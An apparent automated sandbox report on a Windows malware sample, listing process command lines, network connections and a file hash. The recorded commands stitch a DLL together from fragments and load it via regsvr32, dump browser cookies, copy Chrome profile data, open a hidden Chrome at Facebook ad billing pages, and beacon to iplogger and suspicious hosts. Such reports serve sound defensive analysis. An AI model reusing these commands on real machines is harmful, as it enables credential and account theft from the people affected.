"C:\Users\Admin\AppData\Local\Temp\asj.exe"

C:\Users\Admin\AppData\Local\Temp\secd.exe

"C:\Users\Admin\AppData\Local\Temp\secd.exe"

C:\Users\Admin\AppData\Local\Temp\cld.exe

"C:\Users\Admin\AppData\Local\Temp\cld.exe"

C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe

"C:\Users\Admin\AppData\Local\Temp\ubisoftant.exe"

C:\Users\Admin\AppData\Local\Temp\piz.exe

"C:\Users\Admin\AppData\Local\Temp\piz.exe"

C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe

"C:\Users\Admin\AppData\Local\Temp\update_b1f99b.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "" == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\file_clu.exe" ) do taskkill /iM "%~nxH" /F

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX2\per.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac246f8,0x7ffdfac24708,0x7ffdfac24718

C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe

..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /Y "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ..\RwJ2xhfygvdE.exe&& stArt ..\RwJ2xhfygvdE.exe /Pxcee7dXhg1LR & If "/Pxcee7dXhg1LR " == "" for %H In ( "C:\Users\Admin\AppData\Local\Temp\RwJ2xhfygvdE.exe" ) do taskkill /iM "%~nxH" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /iM "file_clu.exe" /F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4068 -ip 4068

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /C eCho | SEt /p = "MZ" > wUAR.VX & cOPy /Y /B wUAr.vX +~TED1E2.CFH + G62c.4+ H7__2BUr.8I + 3O0QMRE.5K + C1SM1U.Qa0 +s77950_.98+ MzfNNq.QI + W8Te.Qm7 + ALXC.kJM + 18CHh.JB + gWp3M.DH + 2CmT.ZW ..\_MORBZV.~5 &sTaRT regsvr32 -s ..\_MOrBZV.~5 -U& DEl /q *

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 340

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCho "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>wUAR.VX"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\regsvr32.exe

regsvr32 -s ..\_MOrBZV.~5 -U

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Windows\SysWOW64\xcopy.exe

xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\" /s /e /y

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99 /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdf733cc40,0x7ffdf733cc4c,0x7ffdf733cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --field-trial-handle=2140,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --field-trial-handle=2244,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rxTe7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac246f8,0x7ffdfac24708,0x7ffdfac24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3532,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3556 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3584,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3688 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1348 -ip 1348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 1192

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\quv.exe

"{path}"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rzm87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfac246f8,0x7ffdfac24708,0x7ffdfac24718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3317520153715266214,10800547276621730904,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4768 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\bhjkgfgzxdd99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4940,i,10229974571698424764,12849520290881299728,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=924 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 98.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 www.cncode.pw udp
US 34.211.97.45:80 www.cncode.pw tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 www.wsfsd33sdfer.com udp
US 8.8.8.8:53 45.97.211.34.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
HK 101.36.107.74:80 tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 is.gd udp
US 104.25.234.53:443 is.gd tcp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.151.35:443 www.facebook.com tcp
US 8.8.8.8:53 53.234.25.104.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.21:443 bitbucket.org tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 35.151.70.163.in-addr.arpa udp
US 8.8.8.8:53 21.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
N/A 224.0.0.251:5353 udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 uehge4g6gh.2ihsfa.com udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 146.54.223.76.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 www.fddnice.pw udp
US 54.244.188.177:80 www.fddnice.pw tcp
US 8.8.8.8:53 177.188.244.54.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 secure.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
GB 163.70.147.35:443 www.facebook.com tcp
GB 163.70.151.14:443 secure.facebook.com tcp
GB 163.70.147.35:443 www.facebook.com udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.147.70.163.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.151.70.163.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net tcp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
GB 163.70.151.21:443 static.xx.fbcdn.net udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 21.151.70.163.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 172.217.16.234:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
GB 163.70.151.35:443 facebook.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
GB 163.70.151.35:443 facebook.com udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.126.244.207:8080 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 104.209.201.84.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 172.217.169.67:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
NL 185.241.54.156:35200 tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 8.8.8.8:53 225.162.46.104.in-addr.arpa udp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp
US 76.223.54.146:80 uehge4g6gh.2ihsfa.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\file_clu.exe

MD5 ec8866c33b44b2e1e84248220ab66d0a
SHA1 07025a834eff898dc14555ec821dcc543d9ee654
SHA256 50e87075abe81f2accb11006aacff87513b8998a8be78721257767cb3c04930c
